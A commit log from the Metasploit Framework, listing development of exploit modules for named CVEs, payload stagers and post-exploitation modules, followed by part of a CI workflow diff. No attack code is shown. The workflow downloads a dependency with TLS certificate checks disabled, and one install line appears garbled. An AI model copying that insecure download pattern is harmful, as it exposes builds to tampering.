Grant Willcox f95a39254a Bump up dependency versions 2023-08-01 15:04:57 -04:00
Spencer McIntyre 396029a58e Fix connectivity issues
The connection needs to slowly send data to the remote end for
stability. Additionally, the `exit` command should be issued when
closing the connction so it is reset back to the logon prompt.
2023-08-01 15:04:32 -04:00
Spencer McIntyre cd70044e36 Automatically login to the serial connection 2023-08-01 15:04:32 -04:00
Spencer McIntyre 18b6b3ef0b Remove the Windows module
Windows shells require an extra configuration that when present still
doesn't offer either the cmd.exe or powershell session that MSF expects
but rather a SAC shell.
2023-08-01 15:04:32 -04:00
Spencer McIntyre 1a3b579cd9 Cleanups and drop INSTANCE_PORT 2023-08-01 15:04:32 -04:00
RageLtMan 2dd9524b2b AWSSSM: hint at alternative command docs 2023-08-01 15:04:32 -04:00
RageLtMan f8c736589f AWSIC: fix comm_string 2023-08-01 15:04:32 -04:00
RageLtMan dc1ca7aeff Fix-up per @adfoster-r7 2023-08-01 15:04:32 -04:00
RageLtMan dd2ccb3750 AWSOOB: add references, cleanup ssm_enum name 2023-08-01 15:04:32 -04:00
RageLtMan 7290a61853 AWSIC: Address @adfoster-r7's comments 2023-08-01 15:04:32 -04:00
RageLtMan 03f6bf1c84 AWSIC: Only try to get session once per handler
Import @smcintyre-r7's fix for multiple session attempts in SSM
2023-08-01 15:04:32 -04:00
RageLtMan 69ae14ec62 AWSIC: payload uri cleanup 2023-08-01 15:04:32 -04:00
Jeffrey Martin eaa4768547 add aws-sdk-ec2instanceconnect gem 2023-08-01 15:04:30 -04:00
RageLtMan 2352ce6740 Implement AWS Instance Connect Sessions
AWS EC2 Nitro instances (and possibly others) support serial proxy
over SSH using the Instance Connect API:
https://docs.amazonaws.cn/en_us/AWSEC2/latest/UserGuide/
connect-to-serial-console.html

This process consists of sending an SSH pubkey to the serial proxy
control plane, connecting to a well-known URL with the instance ID
and port number as username, and the SSH private key as credential.
The resulting session is a "fragile" SSH context which does not
tolerate Channel-closing, requiring some special handling in Msf to
safeguard the initial Net::SSH::CommandStream.

Implement a BindAwsInstanceConnect Handler which loads an SSH key
from the local FS or generates a new one on the fly, passes the
pubkey to the InstanceConnect API, and then establishes SSH comms
with the InstanceConnect SSH proxy.

Implement a AwsInstanceConnectBind to handle resulting connetions,
derived from SshCommandShellBind, with an updated #bootstrap which
avoids meddling with the fragile CommandStream/Channel.

Testing:
  Got serial console to the ttyS0 login prompt of a Nitro EC2 VM.
  Logged in using previously-known credentials.
  Verified console operations.

Notes:
  Handler keeps firing, same as the SSM session concern.
  There is a limit to the number of sessions which an instance can
hold (possibly only one).
2023-08-01 15:04:03 -04:00
Spencer McIntyre 692c625752 Add module docs 2023-08-01 12:28:13 -04:00
Spencer McIntyre eb5be5746c Add a basic check method to detect Citrix 2023-08-01 12:17:30 -04:00
cgranleese-r7 cd8cd0a52b Land #18243, Fix appscan import failure on empty proof 2023-08-01 15:10:06 +01:00
adfoster-r7 5f9d131cdd Fix appscan import failure on empty proof 2023-08-01 14:31:48 +01:00
Metasploit b875b455f7 automatic module_metadata_base.json update 2023-08-01 08:09:04 -05:00
Christophe De La Fuente f07578b4b4 Land #18209, Fix bypassuac_comhijack module crash 2023-08-01 14:52:41 +02:00
Ismail Dawoodjee 11fb61c3b6 Merge branch 'rapid7:master' into subrion_cms_file_upload_rce 2023-08-01 14:24:37 +03:00
usiegl00 c028d33cae Update OSX AARCH64 Stager
This fixes an issue with the stager size in the osx aarch64 payloads. It
also adds the source and Makefile for template_aarch64_darwin.bin
2023-07-31 20:30:30 -07:00
Spencer McIntyre f787bcd04f Define the space for the payload 2023-07-31 18:06:38 -04:00
Metasploit 8b8acadc9c automatic module_metadata_base.json update 2023-07-31 16:53:39 -05:00
bwatters feb54c812c Rather than use default options, deregister and reregister 2023-07-31 16:38:09 -05:00
Spencer McIntyre de6508c3e3 Initial commit of CVE-2023-3519 2023-07-31 17:30:52 -04:00
adfoster-r7 b979217227 Land #18239, Add version numbers to apache nifi rce module 2023-07-31 22:28:52 +01:00
h00die b2869a5550 version numbers for apache nifi rce 2023-07-31 17:16:26 -04:00
h00die 5d9a65eeb0 version numbers for apache nifi rce 2023-07-31 16:14:57 -04:00
h00die 2130328b96 apache superset review 2023-07-31 15:58:40 -04:00
adfoster-r7 89378d54c8 Land #18238, fix bug scanner credential enumeration bug 2023-07-31 16:55:19 +01:00
Dean Welch 9932aaaaaa Add specs for resetting password list when username is specified 2023-07-31 16:22:08 +01:00
Dean Welch 6c367f39c8 Reset password list file descriptor for later use 2023-07-31 15:42:25 +01:00
Metasploit 7df5ae0a62 automatic module_metadata_base.json update 2023-07-31 08:41:50 -05:00
Christophe De La Fuente a7402fb5f1 Land #18205, Add rudder-server SQLI RCE (CVE-2023-30625) exploit 2023-07-31 15:15:07 +02:00
Christophe De La Fuente 56661f49ee Add a comment explaining why the Windows target is disabled 2023-07-31 15:13:35 +02:00
ismaildawoodjee 154387f99a Add additional installation instructions and scenarios 2023-07-30 07:28:16 -04:00
D00Movenok a3f52672da Fix crash for unloaded user32.dll: load library.
Co-authored-by:  ksen-lin <37420872+ksen-lin@users.noreply.github.com>
2023-07-30 00:50:04 +03:00
usiegl00 9019b51eaa Update AARCH64 Shellcode Generation
This updates the aarch64 payloads to include comments with the
corresponding instructions for each little-endian integer. It also fixes
the debug output for x64 payloads under rosetta.
2023-07-29 08:26:56 -07:00
h00die-gr3y 19ef0cc4f9 Added documentation and fixed a typo in the module description 2023-07-28 21:30:24 +00:00
Ismail Dawoodjee aeb8cd3971 Use uri variable instead of hardcoding it - 2nd instance
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-07-28 23:30:42 +03:00
Ismail Dawoodjee 207d00b73c Use uri variable instead of hardcoding it
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-07-28 23:29:06 +03:00
h00die 7c76196a5b apache superset review 2023-07-28 16:21:23 -04:00
ismaildawoodjee 06db7dae40 Change parsing method for version number 2023-07-28 16:17:58 -04:00
h00die-gr3y f282e1ab92 first drop of module 2023-07-28 20:14:44 +00:00
Ismail Dawoodjee c4d089b884 Merge branch 'rapid7:master' into subrion_cms_file_upload_rce 2023-07-28 23:13:11 +03:00
Ege Balcı 0996938113 Add note for Windows compatibility 2023-07-28 17:06:38 +02:00
Ege Balcı c509b7b341 Comment out Windows target related lines 2023-07-28 17:06:21 +02:00
Metasploit bcda3e8228 automatic module_metadata_base.json update 2023-07-28 08:22:17 -05:00
ErikWynter ad1add1dc3 fix for issue #18219, allow index selection for favorites 2023-07-28 16:13:51 +03:00
Christophe De La Fuente 0c1d945861 Land #18221, wdmycloud unauthenticated cmd injection - CVE-2016-10108 CVE-2018-17153 2023-07-28 14:55:50 +02:00
Jack Heysel 416124705f Working in metasploit 2023-07-28 03:43:37 -04:00
ErikWynter 40ef9d496a add docs for wd_mycloud_unauthenticated_cmd_injection 2023-07-28 10:16:50 +03:00
Ege Balcı 225a33995a Merge branch 'rudder_server_sqli_rce' of github.com:egebalci/metasploit-framework into rudder_server_sqli_rce 2023-07-28 00:54:29 +02:00
Ege Balcı 6b11439fa1 Remove basic auth and API_USER/PASS options 2023-07-28 00:44:44 +02:00
Ege Balcı 5d00f882ad Update modules/exploits/multi/http/rudder_server_sqli_rce.rb
Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
2023-07-27 21:58:06 +00:00
ErikWynter f79b4331b8 code review fixes for wd_mycloud_unauthenticated_cmd_injection 2023-07-27 23:09:50 +03:00
Ismail Dawoodjee f3e1fccd0c Merge branch 'rapid7:master' into subrion_cms_file_upload_rce 2023-07-27 22:17:46 +03:00
Metasploit 1390d50ca4 Bump version of framework to 6.3.28 2023-07-27 12:09:19 -05:00
Metasploit b65115e97f automatic module_metadata_base.json update 2023-07-27 11:11:44 -05:00
cgranleese-r7 055206a11b Land #18225, Fix invalid references in modules 2023-07-27 16:56:11 +01:00
adfoster-r7 449af8daa7 Fix broken msfconsole histories when switching between shell sessions 2023-07-27 16:12:57 +01:00
adfoster-r7 f3adc3f79f Fix invalid references in modules 2023-07-27 16:02:37 +01:00
Rory McKinley 0453877fee First iteration of specs for SSH Login scanner 2023-07-27 15:29:02 +02:00
Ege Balcı 103f9a3f60 Update install instructions and scenario 2023-07-26 18:08:54 +02:00
Ege Balcı ca9601bb58 Fixed check method and targets 2023-07-26 18:01:26 +02:00
Ege Balcı 5b5f666256 Make rubocop happy 2023-07-26 16:26:18 +02:00
Ege Balcı 006831938d Adjust targets 2023-07-26 16:26:18 +02:00
Ege Balcı f5e91f686c Update modules/exploits/multi/http/rudder_server_sqli_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-07-26 16:26:18 +02:00
Ege Balcı d50fceca40 Update modules/exploits/multi/http/rudder_server_sqli_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-07-26 16:26:17 +02:00
Ege Balcı 1b52c7c8ba Update modules/exploits/multi/http/rudder_server_sqli_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-07-26 16:26:17 +02:00
Ege Balcı bc58254db8 Update modules/exploits/multi/http/rudder_server_sqli_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-07-26 16:26:17 +02:00
Ege Balcı 00f2fe03be Update documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-07-26 16:26:17 +02:00
Ege Balcı fa3638b10e Update documentation/modules/exploit/multi/http/rudder_server_sqli_rce.md
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-07-26 16:26:17 +02:00
Ege Balcı d6328edc27 Make rubocop happy 2023-07-26 16:26:17 +02:00
Ege Balcı 5018c0cdc5 Add documentation 2023-07-26 16:26:17 +02:00
Ege Balcı 47f48e8adb Add rudder-server SQLI RCE (CVE-2023-30625) exploit 2023-07-26 16:26:17 +02:00
ErikWynter 53b8653ac7 add wd_mycloud_unauthenticated_cmd_injection 2023-07-26 17:24:44 +03:00
Dean Welch d9817e825e Add error handling when loading payloads 2023-07-26 12:01:46 +01:00
ismaildawoodjee b7b11373f5 Use full_uri for the payload URI 2023-07-25 22:53:11 -04:00
Ismail Dawoodjee 7ad7c40e40 Merge branch 'rapid7:master' into subrion_cms_file_upload_rce 2023-07-26 05:27:12 +03:00
Spencer McIntyre 01b9d41ed1 Land #18213, Fix evasion windows syscall inject
Fix evasion windows syscall inject module crash
2023-07-25 16:30:59 -04:00
Ismail Dawoodjee 867282ba96 Merge branch 'rapid7:master' into subrion_cms_file_upload_rce 2023-07-25 23:09:30 +03:00
ismaildawoodjee 671a90ee58 Put checks for website requests and change failure message 2023-07-25 16:08:25 -04:00
Metasploit 29e8c36214 automatic module_metadata_base.json update 2023-07-25 11:02:17 -05:00
Christophe De La Fuente c7f8ce5acd Land #18199, VMWare vRealize Network Insight pre-authenticated RCE CVE-2023-20887 2023-07-25 17:45:30 +02:00
Ismail Dawoodjee 78c1f75f2a Merge branch 'rapid7:master' into subrion_cms_file_upload_rce 2023-07-25 18:01:08 +03:00
ismaildawoodjee e9f53bd195 Use full_uri instead of piecing together a full URI 2023-07-25 11:00:21 -04:00
Metasploit 730d774e7e automatic module_metadata_base.json update 2023-07-25 09:31:21 -05:00
cgranleese-r7 a244c6ff37 Land #18142, WordPress File Manager Advanced Shortcode Unauthenticated RCE [CVE-2023-2068] 2023-07-25 15:15:22 +01:00
cgranleese-r7 52b417b1af Update documentation/modules/exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce.md 2023-07-25 14:06:45 +01:00
h00die-gr3y 43056ad621 removed powershell mixin 2023-07-25 14:06:45 +01:00
h00die-gr3y c1d84e950c Update based on bwatters-r7 comments 2023-07-25 14:06:44 +01:00
h00die-gr3y 45eacec846 Updated module with WordPress check 2023-07-25 14:06:44 +01:00
h00die-gr3y a3daab88e6 Added documentation and updated exploitable plugins list 2023-07-25 14:06:42 +01:00
h00die-gr3y cda6ab5960 init commit module 2023-07-25 14:06:29 +01:00
adfoster-r7 fa97281267 Add documentation on building and testing vulnerable targets 2023-07-25 13:48:38 +01:00
ismaildawoodjee e2a0405975 Merge branch 'subrion_cms_file_upload_rce' of github.com:ismaildawoodjee/metasploit-framework into subrion_cms_file_upload_rce 2023-07-25 03:49:13 -04:00
ismaildawoodjee 3ce382dcc2 Fix issues with msftidy_docs.rb 2023-07-25 03:48:58 -04:00
bwatters 39f24a305e Change default command to certutil for Windows HTTP Fetch and default FETCH_SRVHOST to LHOST 2023-07-24 15:53:19 -05:00
Ismail Dawoodjee a709c4c010 Update modules/exploits/linux/http/subrion_cms_file_upload_rce.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2023-07-24 20:36:28 +03:00
adfoster-r7 49f2d1c3a9 Fix evasion windows syscall inject module crash 2023-07-24 16:15:51 +01:00
ismaildawoodjee 568849fad3 Add scenario for Ubuntu 20.04 2023-07-24 11:03:49 -04:00
ismaildawoodjee 4e16307165 Add module and documentation for Subrion CMS v4.2.1 RCE 2023-07-21 17:22:58 -04:00
Jack Heysel 586971c1fd Fix incomplete copy pasta in docs 2023-07-21 14:38:07 -04:00
adfoster-r7 c26d44a177 Fix bypassuac_comhijack module crash 2023-07-21 16:46:43 +01:00
Metasploit 69cebde238 automatic module_metadata_base.json update 2023-07-21 06:15:43 -05:00
adfoster-r7 f287f50be7 Land #18187, Fixes incorrect usage of pack/unpack directives 2023-07-21 11:40:02 +01:00
dwelch-r7 1af22cfd22 Land #18096, Add initial proxies datastore support for kerberos workflows 2023-07-21 11:37:04 +01:00
adfoster-r7 08a2a293a9 Add proxies datastore support to kerberos 2023-07-21 11:19:50 +01:00
RadioLogic 49eeb90145 Removed pointless line 2023-07-20 19:25:09 -04:00
Jack Heysel ee26e7f926 Rubocop fixes 2023-07-20 16:40:28 -04:00
RadioLogic 0de59481e9 Added better means to ignore groups additions on empty set 2023-07-20 15:18:48 -04:00
RadioLogic 761f91faf0 Added quotes around password to prevent bash shebang 2023-07-20 15:17:26 -04:00
Jack Heysel 421b06119f Update docs 2023-07-20 14:55:27 -04:00
RadioLogic ab5b12e8f1 Corrected sideeffects
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2023-07-20 14:52:46 -04:00
RadioLogic 923cb78110 Corrected reliability
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2023-07-20 14:52:27 -04:00
Jack Heysel c48346413c Fixed payload and verion detection 2023-07-20 14:44:56 -04:00
Metasploit b4ec01de83 Bump version of framework to 6.3.27 2023-07-20 12:14:17 -05:00
adfoster-r7 2ae6688815 Fix libssh_auth_bypass crash on newer versions 2023-07-20 12:29:21 +01:00
Jack Heysel d03157fcc1 Installation instructions 2023-07-19 14:23:17 -04:00
jvoisin 0df2f57124 Fix a typo 2023-07-19 19:47:17 +02:00
Julien Voisin d5ca174e1e Apply suggestions from code review
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2023-07-19 17:46:27 +00:00
h00die 530934f78a review comments 2023-07-19 11:42:47 -04:00
cgranleese-r7 8e0a909b18 Fixes incorrect usage of pack/unpack directives 2023-07-19 11:39:00 +01:00
Metasploit b4991a97d0 automatic module_metadata_base.json update 2023-07-18 20:26:47 -05:00
bwatters 01434662fa Land #18182, Add module and doc for cve-2023-26876
Merge branch 'land-18182' into upstream-master
2023-07-18 20:10:47 -05:00
Metasploit a6e4d60457 automatic module_metadata_base.json update 2023-07-18 18:40:14 -05:00
bwatters 297c484a1c Land #18173, Add Openfire Authentication Bypass RCE [CVE-2023-32315]
Merge branch 'land-18173' into upstream-master
2023-07-18 18:13:20 -05:00
Metasploit 1e2a5a5c11 automatic module_metadata_base.json update 2023-07-18 08:41:15 -05:00
cgranleese-r7 a0f04a7018 Land #17681, Add datastore option for Jenkins home directory 2023-07-18 14:17:15 +01:00
Joshua Rogers d9e23a5c67 Update modules/post/multi/gather/jenkins_gather.rb
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2023-07-18 14:02:27 +02:00
h00die-gr3y 7f35abff86 fixed the invalid character at the store_valid_credential‎ function 2023-07-18 08:38:06 +00:00
rodnt ddb1cc0497 Fix all warns from msftidy rename the docs with the correct name 2023-07-17 23:57:39 +00:00
RadioLogic 157a815b76 Added documentation 2023-07-17 16:14:03 -04:00
RadioLogic 0680630d25 Redefined verbose prints 2023-07-17 16:04:37 -04:00
RadioLogic 394ea6029a Added prevention of printing empty missing groups 2023-07-17 15:46:17 -04:00
RadioLogic 1c693d9fad Finalized /etc/shadow line 2023-07-17 15:43:28 -04:00
RadioLogic 427e39b152 Added check to prevent manual from readding users 2023-07-17 15:42:48 -04:00
RadioLogic cc9d70b896 Added missing each in manual groups 2023-07-17 15:37:50 -04:00
RadioLogic 4ff7babae7 Turned missing groups into enum 2023-07-17 15:15:53 -04:00
RadioLogic 6e6910519a Added error if custom command doesnt exist 2023-07-17 13:59:30 -04:00
RadioLogic 9bc00f7759 Implemented custom command detection 2023-07-17 13:59:09 -04:00
RadioLogic 3a3ffcb6df Swapped vprint in useradd 2023-07-17 13:58:18 -04:00
RadioLogic 7e9071627f Added better verbose logging 2023-07-17 13:35:45 -04:00
RadioLogic c63810101c Added error for illegal usernames 2023-07-17 12:47:34 -04:00
h00die-gr3y 0ff2ca4f40 updates based on latest comments 2023-07-16 18:43:21 +00:00
jvoisin 2efcbbb772 Add docker detection via the old .dockerinit file 2023-07-16 18:12:11 +02:00
jvoisin 1f2112c5c1 Add podman detection via an environment variable 2023-07-16 18:11:11 +02:00
jvoisin f46641f479 Improve LXC detection
See https://github.com/silverwind/ansible/commit/d649d24be2ed36ff8da7ecbd57b6bb25a9a3b745
2023-07-16 18:07:59 +02:00
jvoisin 2e26e7c98c Add detection for WSL 2023-07-16 18:04:12 +02:00
jvoisin 04438920d5 Add Podman detection
See https://github.com/containers/podman/issues/3586#issuecomment-661918679
2023-07-16 18:01:06 +02:00
Guilhem RIOUX 84ad51b5c7 rubocop 2023-07-16 05:38:51 +02:00
H00die.Gr3y f608424242 Apply suggestions from code review
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
Co-authored-by: Brendan <bwatters@rapid7.com>
2023-07-15 12:02:22 +02:00
H00die.Gr3y dfcb52d189 Merge pull request #1 from bwatters-r7/land-18173
Adjust files to be better shared
2023-07-15 11:46:41 +02:00
rodnt d7b0e94729 fix made at the request of bwatters-r7 2023-07-14 21:34:32 +00:00
Jack Heysel 11d3248532 Land #18186, Add syntax highlighting to wiki
This PR adds highlining to multiple code snippets in the wiki.
2023-07-14 14:53:38 -04:00
bwatters b15d595de2 Adjust files to be better shared 2023-07-14 12:47:04 -05:00
adfoster-r7 f0f2314da9 Add syntax highlighting to multiple code snippets 2023-07-14 11:52:47 +01:00
rodnt 1e75365f8e Update with all changes proposed by smcintyre-r7 2023-07-13 23:38:55 +00:00
Metasploit 7bebee0f42 Bump version of framework to 6.3.26 2023-07-13 12:13:12 -05:00
rodnt 3f0d0ee34c Merge branch 'rapid7:master' into piwigo_cve_26876 2023-07-13 09:59:43 -03:00
rodnt fb8947aa49 change the comment at mysql image 2023-07-13 12:58:30 +00:00
rodnt 4dc6e59fa3 bwatters-r7 suggestions were applied. 2023-07-13 12:51:34 +00:00
101719434+rodnt@users.noreply.github.com 5b638bb37b add module and doc for cve-2023-26876 2023-07-12 15:45:40 -03:00
h00die e6f4f441c5 apache supserset exploit 2023-07-11 15:21:39 -04:00
h00die 3d3e2a9e2d apache supserset exploit 2023-07-11 15:19:33 -04:00
Guilhem7 a9a6b03979 Update modules/exploits/multi/php/jorani_path_trav.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2023-07-11 09:28:20 +02:00
Guilhem7 56619e6da3 Update modules/exploits/multi/php/jorani_path_trav.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2023-07-11 09:28:14 +02:00
Guilhem7 8d08a2a144 Update modules/exploits/multi/php/jorani_path_trav.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2023-07-11 09:28:05 +02:00
h00die-gr3y c34779a5f1 updates based on comments of jvoisin and adfoster-r7 2023-07-09 12:20:58 +00:00
h00die-gr3y a3ea55f2a6 added documentation 2023-07-08 12:30:54 +00:00
h00die-gr3y 8edbf73b6f first release exploit module 2023-07-08 09:48:17 +00:00
Guilhem RIOUX e274b96a13 Updating documentation 2023-07-08 07:29:38 +02:00
h00die 2c2f855e20 working cookies for superset 2023-07-06 07:12:39 -04:00
h00die 62775e0749 fix spec 2023-07-02 13:10:43 -04:00
h00die c9249fd9b7 basics 2023-07-02 12:37:58 -04:00
Grant Willcox 3ab7b3ddc7 Add in autocheck and expand check logic for Windows 11 targets 2023-06-30 16:41:03 -05:00
Grant Willcox 17ffd4e0f6 Add in description about why versions after 22000.194 aren't affected 2023-06-30 16:40:53 -05:00
Wrathdemon 7870bfe94e fix #15890: Support Windows 11 in Capcom.sys LPE Module 2023-06-30 16:40:43 -05:00
Guilhem RIOUX 068a81a638 First remove the check after the triggering payload as it is not reliable. Adding the documentation after checking it with the dev tool 2023-06-28 08:53:50 +02:00
Grant Willcox 1b7e1343f8 Fix up some points noted during review 2023-06-27 11:32:44 -05:00
Grant Willcox c11dd0efc4 Fix up RuboCop errors 2023-06-27 11:23:41 -05:00
Guilhem RIOUX 8cae031d97 update after rubocop and advice 2023-06-27 16:08:55 +02:00
Joshua Rogers 1e7af0457a Update jenkins_gather.md
Change Windows default to C:\ProgramData\Jenkins\.jenkins.
2023-06-26 21:29:27 +02:00
Joshua Rogers cac515b8db Update jenkins_gather.rb
Change the default Windows location to C:\ProgramData\Jenkins\.jenkins\.
2023-06-26 21:27:59 +02:00
manishkumarr1017 87582ee5c9 PR Review changes 2023-06-23 13:14:48 +05:30
manishkumarr1017 375a91e4f7 Merge branch 'rapid7:master' into add_new_column_in_creds 2023-06-23 11:35:34 +05:30
Guilhem RIOUX 784f76b355 update after rubocop 2023-06-19 14:31:23 +02:00
usiegl00 1c5b88c59f Update CachedSize for Mettle 2023-06-19 12:23:40 +02:00
usiegl00 7e3e30f9d0 Bump Mettle Version 2023-06-19 11:56:52 +02:00
usiegl00 22101f15cc Update Aarch64 Payloads for RuboCop
Use msftidy to fix the rubocop errors.
2023-06-19 11:20:23 +02:00
usiegl00 b8068bc781 Cleanup for Sonoma Dyld
This adds support for the dyld changes incorperated into Sonoma and
cleans up the existing support for Ventura. This does not break
compatibility with previous versions.
2023-06-19 10:57:37 +02:00
usiegl00 0415565396 Fix for Ventura Dyld
This adds support for the dyld changes incorperated into Ventura which
includes changes to the symbols used. This does not break compatibility
with previous versions.
2023-06-19 10:57:37 +02:00
usiegl00 44762f18e8 Increase Stack Space for Loader
This increases the stack stack space mmap'd for the 2nd stage loader and
should fix the invalid stack memory access crash on the staged payload.
2023-06-19 10:57:37 +02:00
usiegl00 e70bdb028a Basic MachO Signing
This commit adds the sign method to Payload::MachO which performs a
basic SHA256 signature update on the provided macho to enable it to run
under osx aarch64 systems.
2023-06-19 10:57:37 +02:00
usiegl00 658c87996d Hotwire MachO Signing
This commit hotwires in executable signing to some of the aarch64 osx
payloads in order to ensure that they are fully functional.
2023-06-19 10:57:37 +02:00
usiegl00 8a5442f7f0 Fix AARCH64 MachO Generation
This updates the exe util to properly generate stageless aarch64 macho
payloads. I've also added comments on how to assemble the aarch64
stages.
2023-06-19 10:57:37 +02:00
usiegl00 8c4c260911 Mettle now supports aarch64-apple-darwin
This bumps the metasploit_payloads-mettle version to enable the new
target triple.
2023-06-19 10:57:37 +02:00
usiegl00 5f8767f4cf M1ssion Dyld Mettle: Aarch64 Payloads
This builds on Back from the dyld by adding the required aarch64
assembly code to enable the OSX loader to run on the m1. This enables
the use of native payloads on M1 or M2 devices that do not have Rosetta
installed.
2023-06-19 10:57:37 +02:00
Guilhem RIOUX 8d7dc7ae26 Add exploit for unauth RCE Jorani 2023-06-19 06:16:07 +02:00
SinSinology fd5e4dfc39 VMWare vRealize Network Insight pre-authenticated RCE CVE-2023-20887
Technical details at
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
2023-06-13 15:16:11 +01:00
RadioLogic ed5eeea2e6 Added a lot of vprints 2023-06-02 21:13:30 -04:00
RadioLogic e743edb933 Fixed instance of no groups 2023-06-02 21:13:10 -04:00
RadioLogic 3dcfaac0de Removed use of manual binary in platform check 2023-06-02 21:12:05 -04:00
RadioLogic e2d56c02c4 Added use of sysinfo for getting OS 2023-06-02 21:11:41 -04:00
RadioLogic 3af89850dd Added faulire for shell not existing 2023-06-02 21:11:02 -04:00
RadioLogic c2a48cde7c Added post module to cleanly add new users 2023-06-02 19:11:16 -04:00
manishkumarr1017 bd9591f621 changing nil datatype to string datatype for the column display 2023-05-19 19:11:06 +05:30
manishkumarr1017 df4a5b9d69 Merge branch 'master' of github.com:manishkumarr1017/metasploit-framework into add_new_column_in_creds 2023-05-19 18:45:38 +05:30
Y1Daa d8beb8cfef fix nessus_db_import & nessus_scan_export bugs 2023-05-07 21:27:50 +08:00
bcoles 71f938682c Post::Windows::Service: Support start/stop service on shell sessions 2023-04-28 18:44:11 +10:00
emirpolatt c65685deae CVE-2023-27253 - PfSense 2.6.0 'Backup & Restore' OS Command Injection Module 2023-03-26 02:46:31 +03:00
manishkumarr1017 4aea945be3 fixing the failed specs by keeping the exact output necessary 2023-03-18 23:24:00 +05:30
manishkumarr1017 02608a4e12 adding extra specs for the new enhancement and optimizing the queries 2023-03-18 23:04:55 +05:30
manishkumarr1017 dc97b33f4a Merge branch 'rapid7:master' into add_new_column_in_creds 2023-03-18 20:45:41 +05:30
Grant Willcox 28a2bcf9d7 Fix calculation of delete_count size 2023-03-06 12:30:06 -06:00
manishkumarr1017 60113f74b7 fixing spec files for creds command new enhancements 2023-03-01 23:27:18 +05:30
manishkumarr1017 cae7f8c350 adding a new column cracked password in creds command to show cracked passwords 2023-02-23 15:01:51 +05:30
Joshua Rogers 0f5f495108 Add default locations for the Jenkins home directory, and add an optional value that a user can suggest the home directory. 2023-02-22 03:56:54 +01:00
792 changed files with 81910 additions and 3208 deletions
+223
View File
@@ -0,0 +1,223 @@
name: Acceptance
# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
#concurrency:
# group: ${{ github.ref }}-${{ github.workflow }}
# cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
issues: none
discussions: none
packages: none
pages: none
pull-requests: none
repository-projects: none
security-events: none
statuses: none
on:
push:
branches-ignore:
- gh-pages
- metakitty
pull_request:
branches:
- '*'
paths:
- 'metsploit-framework.gemspec'
- 'Gemfile.lock'
- 'data/templates/**'
- 'modules/payloads/**'
- 'lib/msf/core/payload/**'
- 'lib/msf/core/**'
- 'tools/dev/**'
- 'spec/acceptance/**'
- 'spec/acceptance_spec_helper.rb'
# Example of running as a cron, to weed out flaky tests
# schedule:
# - cron: '*/15 * * * *'
jobs:
# Run all test individually, note there is a separate final job for aggregating the test results
test:
strategy:
fail-fast: false
matrix:
os:
- macos-11
- windows-2019
- ubuntu-20.04
ruby:
- 3.0.2
meterpreter:
# Python
- { name: python, runtime_version: 3.6 }
- { name: python, runtime_version: 3.11 }
# Java - newer versions of Java are not supported currently: https://github.com/rapid7/metasploit-payloads/issues/647
- { name: java, runtime_version: 8 }
# PHP
- { name: php, runtime_version: 5.3 }
- { name: php, runtime_version: 7.4 }
- { name: php, runtime_version: 8.2 }
include:
# Windows Meterpreter
- { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
- { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
# Mettle
- { meterpreter: { name: mettle }, os: macos-11 }
- { meterpreter: { name: mettle }, os: ubuntu-20.04 }
runs-on: ${{ matrix.os }}
timeout-minutes: 25
env:
RAILS_ENV: test
HOST_RUNNER_IMAGE: ${{ matrix.os }}
METERPRETER: ${{ matrix.meterpreter.name }}
METERPRETER_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
steps:
- name: Install system dependencies (Linux)
if: runner.os == 'Linux'
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
- uses: shivammathur/setup-php@5b29e8a45433c406b3902dff138a820a408c45b7
if: ${{ matrix.meterpreter.name == 'php' }}
with:
php-version: ${{ matrix.meterpreter.runtime_version }}
tools: none
- name: Set up Python
if: ${{ matrix.meterpreter.name == 'python' }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.meterpreter.runtime_version }}
- uses: actions/setup-java@v3
if: ${{ matrix.meterpreter.name == 'java' }}
with:
distribution: temurin
java-version: ${{ matrix.meterpreter.runtime_version }}
- name: Install system dependencies (Windows)
shell: cmd
if: runner.os == 'Windows'
run: |
REM pcap dependencies
powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
choco install 7zip.installServerCertificateValidationCallback
7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
dir C:\\
dir %WINDIR%
type %WINDIR%\\system32\\drivers\\etc\\hosts
- name: Checkout code
uses: actions/checkout@v3
